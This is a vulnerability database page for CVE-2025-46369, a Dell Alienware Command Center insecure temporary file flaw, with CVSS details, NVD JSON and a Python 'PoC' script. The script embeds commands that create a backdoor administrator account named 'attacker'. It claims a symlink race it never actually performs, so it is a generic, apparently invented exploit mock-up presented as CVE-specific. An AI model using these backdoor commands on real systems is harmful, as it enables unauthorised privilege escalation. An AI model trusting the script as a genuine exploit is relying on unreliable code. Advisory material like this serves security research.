Security Vulnerability Report
中文
CVE-2025-46369 CVSS 7.8 HIGH

CVE-2025-46369

Published: 2025-11-13 20:15:50
Last Modified: 2025-11-17 12:26:51

Description

Dell Alienware Command Center 6.x (AWCC), versions prior to 6.10.15.0, contains an Insecure Temporary File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Privilege Escalation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:alienware_command_center:*:*:*:*:*:*:*:* - VULNERABLE
Dell Alienware Command Center (AWCC) < 6.10.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-46369 PoC - Insecure Temporary File in Dell AWCC # This is a conceptual PoC demonstrating the vulnerability import os import time import threading from pathlib import Path def exploit_vulnerable_temp_file(): """ Simulate exploitation of insecure temporary file vulnerability in Dell Alienware Command Center """ # Target temporary directory used by AWCC temp_dir = os.getenv('LOCALAPPDATA') + '\\Dell\\AWCC\\Temp\\' # Malicious payload to be executed with elevated privileges malicious_payload = ''' # Add your malicious code here # This would typically create a backdoor or execute arbitrary code import os os.system('net user attacker P@ssw0rd123 /add') os.system('net localgroup Administrators attacker /add') ''' print(f"[*] Targeting: {temp_dir}") print("[*] Setting up symlink attack...") # Race condition exploitation def create_symlink(): target_path = os.getenv('WINDIR') + '\\System32\\malicious.dll' temp_file = temp_dir + 'awcc_temp.tmp' try: # In real attack, this would use symlink to redirect # temporary file creation to a privileged location print(f"[*] Attempting to create temp file: {temp_file}") with open(temp_file, 'w') as f: f.write(malicious_payload) except Exception as e: print(f"[!] Error: {e}") # Start race condition thread = threading.Thread(target=create_symlink) thread.start() print("[+] Waiting for vulnerable application to create temp file...") time.sleep(2) print("[!] In real scenario, this would result in privilege escalation") print("[!] The malicious file would be executed with SYSTEM privileges") if __name__ == '__main__': print("CVE-2025-46369 - Dell AWCC Insecure Temporary File") print("=" * 50) exploit_vulnerable_temp_file()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46369", "sourceIdentifier": "[email protected]", "published": "2025-11-13T20:15:50.080", "lastModified": "2025-11-17T12:26:51.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Alienware Command Center 6.x (AWCC), versions prior to 6.10.15.0, contains an Insecure Temporary File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Privilege Escalation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:alienware_command_center:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.10.15.0", "matchCriteriaId": "B4F88A51-8AAC-456E-9817-C159C81ACC20"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000379467/dsa-2025-392", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}